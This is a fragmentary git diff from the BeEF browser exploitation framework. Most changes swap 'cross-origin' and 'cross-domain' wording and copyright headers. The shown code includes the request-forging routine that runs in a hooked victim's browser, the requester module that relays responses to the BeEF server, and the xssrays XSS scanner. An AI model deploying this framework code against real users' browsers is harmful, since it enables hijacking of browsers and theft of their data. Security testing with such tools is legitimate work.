// if the request was cross-domain from a HTTPS origin to HTTP
// don't proceed and return
if (document.location.protocol == 'https:' && scheme == 'http') {
beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -379,7 +379,7 @@ beef.net = {
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for cross origin requests.
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -432,10 +432,10 @@ beef.net = {
},
complete: function (xhr, textStatus) {
// cross-origin request
if (cross_origin) {
// cross-domain request
if (cross_domain) {
response.port_status = "crossorigin";
response.port_status = "crossdomain";
if (xhr.status != 0) {
response.status_code = xhr.status;
@@ -446,7 +446,7 @@ beef.net = {
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossorigin";
response.status_text = "crossdomain";
}
if (xhr.getAllResponseHeaders()) {
@@ -460,7 +460,7 @@ beef.net = {
}
} else {
// same-origin request
// same-domain request
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();

4
core/main/client/net/connection.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/net/dns.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/net/local.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/net/portscanner.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

6
core/main/client/net/requester.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -25,7 +25,7 @@ beef.net.requester = {
request = requests_array[i];
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,

4
core/main/client/net/xssrays.js
View File

@@ -171,7 +171,7 @@ beef.net.xssrays = {
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
search:url.search, type: 'url'});//scan each link & param
} else {
beef.debug('Scan is not Cross-origin. URLS\nurl :' + url.hostname.toString());
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
beef.debug('\nlocation :' + location.hostname.toString());
}
}
@@ -251,7 +251,7 @@ beef.net.xssrays = {
continue;
}
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
beef.debug('location :' + this.host(location));
continue;
}

4
core/main/client/os.js
View File

@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

Some files were not shown because too many files have changed in this diff Show More